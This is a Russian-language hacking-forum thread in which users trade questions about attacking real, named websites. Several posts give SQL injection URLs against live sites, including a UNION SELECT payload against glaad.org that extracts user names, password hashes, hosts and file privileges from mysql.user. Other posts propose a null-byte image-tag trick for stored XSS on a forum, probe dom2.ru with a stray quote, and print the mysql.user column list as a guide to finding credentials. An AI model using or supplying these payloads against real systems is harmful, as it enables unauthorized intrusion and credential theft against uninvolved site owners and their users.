Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. serfertty

    serfertty Guest

    Reputations:
    0
    Похоже на DES.
     
  2. z00MAN

    z00MAN Banned

    Joined:
    20 Nov 2008
    Messages:
    360
    Likes Received:
    276
    Reputations:
    41
    хм, а разве знаки не различные должны быть в DES?
     
  3. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    http://www.yvec.com/innerpage.php?cat_id=-3+union+select+1/*
    неподбор
     
  4. none222

    none222 Guest

    Reputations:
    0
    sabe, там 2 запроса с разным кол-вом колумнов
     
  5. .Striker

    .Striker Elder - Старейшина

    Joined:
    11 Nov 2007
    Messages:
    82
    Likes Received:
    63
    Reputations:
    -4
    нашол на одном форуме ипб
    в тег если прописать
    [ img]http://site.com/folder/script%00.jpg[ /img]
    то адрес картинки получается в подписи http://site.com/folder/script
    можно из этого сделать активную xss?
     
  6. geforce

    geforce Member

    Joined:
    21 Aug 2008
    Messages:
    300
    Likes Received:
    26
    Reputations:
    -5
    Помогите! Это инъекция???


    http://dom2.ru/heroes/1697'
     
  7. z00MAN

    z00MAN Banned

    Joined:
    20 Nov 2008
    Messages:
    360
    Likes Received:
    276
    Reputations:
    41
    нет
     
  8. geforce

    geforce Member

    Joined:
    21 Aug 2008
    Messages:
    300
    Likes Received:
    26
    Reputations:
    -5
    А что это тогда????
     
  9. geforce

    geforce Member

    Joined:
    21 Aug 2008
    Messages:
    300
    Likes Received:
    26
    Reputations:
    -5
    И как ею можно воспользоваться?
     
  10. geforce

    geforce Member

    Joined:
    21 Aug 2008
    Messages:
    300
    Likes Received:
    26
    Reputations:
    -5
    Как никак! Если запрос http://dom2.ru/heroes/1697' проходит и переменая $hero.name не проверяется вот и по этому она выводится! так как она пустая функция echo выводит её не как переменю а как текст! Пример echo ("$hero.name"); из этого следует что запрос к базе прошел!!! Я не прав?
     
  11. MatriX30000

    MatriX30000 Member

    Joined:
    6 Jan 2009
    Messages:
    41
    Likes Received:
    10
    Reputations:
    0
    скажите пожалуйсто а рейтинг в контакте имеет уязвимости???
     
  12. SVAROG

    SVAROG Elder - Старейшина

    Joined:
    13 Feb 2007
    Messages:
    424
    Likes Received:
    86
    Reputations:
    -1
    MatriX30000 попробуй кавычку подставить
     
    2 people like this.
  13. geforce

    geforce Member

    Joined:
    21 Aug 2008
    Messages:
    300
    Likes Received:
    26
    Reputations:
    -5
    Почитай статьи про уязвимости а потом задавай вопросы !!!
     
  14. geforce

    geforce Member

    Joined:
    21 Aug 2008
    Messages:
    300
    Likes Received:
    26
    Reputations:
    -5
    А как тогда она выводится???
     
  15. 4adr0s

    4adr0s Elder - Старейшина

    Joined:
    14 Dec 2007
    Messages:
    75
    Likes Received:
    11
    Reputations:
    0
    Вообщем, дело такое.
    тут я, вроде бы, что-то как-то разобрался:
    правда, куда этот логин/пасс втыкать не въехал (http://www.gps-ru.ru/admin не катит)

    есть еще вот такое срамотный сайт:

    вот во 2-м случае я не понял: кто такой andy? и как бы мне найти логин/пароль как из 1-го случая....
     
  16. .Slip

    .Slip Elder - Старейшина

    Joined:
    16 Jan 2006
    Messages:
    1,571
    Likes Received:
    977
    Reputations:
    783
    Тебе флудом мозги съело? Он вручную будет подбирать дефолтную структуру таблицы мускуля? Омфг.
    Code:
    mysql> select column_name from information_schema.columns where table_name='mysql.user';
    +-----------------------+
    | column_name           |
    +-----------------------+
    | Host                  |
    | User                  |
    | Password              |
    | Select_priv           |
    | Insert_priv           |
    | Update_priv           |
    | Delete_priv           |
    | Create_priv           |
    | Drop_priv             |
    | Reload_priv           |
    | Shutdown_priv         |
    | Process_priv          |
    | File_priv             |
    | Grant_priv            |
    | References_priv       |
    | Index_priv            |
    | Alter_priv            |
    | Show_db_priv          |
    | Super_priv            |
    | Create_tmp_table_priv |
    | Lock_tables_priv      |
    | Execute_priv          |
    | Repl_slave_priv       |
    | Repl_client_priv      |
    | Create_view_priv      |
    | Show_view_priv        |
    | Create_routine_priv   |
    | Alter_routine_priv    |
    | Create_user_priv      |
    | ssl_type              |
    | ssl_cipher            |
    | x509_issuer           |
    | x509_subject          |
    | max_questions         |
    | max_updates           |
    | max_connections       |
    | max_user_connections  |
    +-----------------------+
    37 rows in set
     
    2 people like this.
  17. AkyHa_MaTaTa

    AkyHa_MaTaTa Elder - Старейшина

    Joined:
    19 Mar 2007
    Messages:
    557
    Likes Received:
    306
    Reputations:
    27
    а ты уверен что off-docnescott - это админ?



    поробу вот так:
    http://www.glaad.org/action/calls_archive_detail.php?id=-4805+union+select+1,2,3,4,5,concat_ws(0x3a,user,password,host,file_priv) ,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+mysql .user+where+host='%'/*
     
  18. [Raz0r]

    [Raz0r] Elder - Старейшина

    Joined:
    25 Feb 2007
    Messages:
    425
    Likes Received:
    484
    Reputations:
    295
    $hero.name - это не переменная, присваивающая входящие данные, а скорее всего обозначение для шаблонизатора, куда он должен вставлять соответствующие данные из базы данных или файлов. Уязвимости в данном случае нет.
     
  19. geforce

    geforce Member

    Joined:
    21 Aug 2008
    Messages:
    300
    Likes Received:
    26
    Reputations:
    -5
    http://dom2.ru/magazine/numbers/1308392'

    а вот это? :confused:
     
  20. noisia

    noisia Elder - Старейшина

    Joined:
    13 Mar 2007
    Messages:
    20
    Likes Received:
    10
    Reputations:
    0
    это тоже самое
     
Thread Status:
Not open for further replies.